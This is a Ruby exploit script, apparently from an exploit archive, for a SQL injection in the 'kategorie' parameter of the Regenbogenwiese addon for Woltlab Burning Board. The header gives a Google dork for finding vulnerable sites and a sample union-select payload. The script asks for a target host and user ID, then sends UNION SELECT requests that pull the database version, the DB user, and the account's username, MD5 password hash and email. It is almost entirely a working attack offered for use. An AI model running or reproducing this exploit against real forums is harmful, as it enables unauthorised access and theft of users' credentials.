# Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit
# Google Dork: inurl:regenbogenwiese.php wbb (and more)
# Date: 04.09.2013
# Exploit Author: Easy Laster
# Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe
# Version: 1.5
# Tested on: Windows 8/Backtrack
#
#!/usr/bin/ruby
#secunet.cc
#30.07.2013
#regenbogenwiese.php?kategorie='+union+select
#+1,1,1,1,1,1,concat(database(),0x3a,user(),0x
#3a,userid,0x3a,password,0x3a,username,0x3a,em
#ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+
#Discovered and Vulnerability by Easy Laster
print "
################################################################
# secunet.cc #
################################################################
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
#Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection#
# (regenbogenwiese.php, kategorie param) #
# Exploit #
# Using Host+Path+id #
# www.demo.de + /wbb/ + or + / + 1 #
# Easy Laster #
#PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT#
################################################################
"
require 'net/http'
block = "################################################################"
print ""+ block +""
print "\nEnter Target Name (site.com)->"
host=gets.chomp
print ""+ block +""
print "\nEnter Script Path (/wbb/ or /)->"
path=gets.chomp
print ""+ block +""
print "\nEnter The ID From User (id)->"
userid=gets.chomp
print ""+ block +""
begin
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+
"0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+
""+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
"at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+
"+where+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nDatabase User -> "+(/'~'(.+)'~'/).match(resp.body)[1]
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
"(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+
"ere+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nID Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
"(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
"here+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+
"(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+
"here+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]
dir = "regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+
"at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+
"where+userid="+ userid +"--+"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]
print "\n"
print ""+ block +""
print "\n"
print "
################################################################
# Greetings #
################################################################
-#------------------------+ | | #---------------------+
-#------------------------+ _|_|_ #---------------------+
-#------------------------+ (o o) #---------------------+
-#------------------------+ooO--(_)--Ooo-#---------------------+
################################################################
"
rescue
print "\nExploit Failed"
end
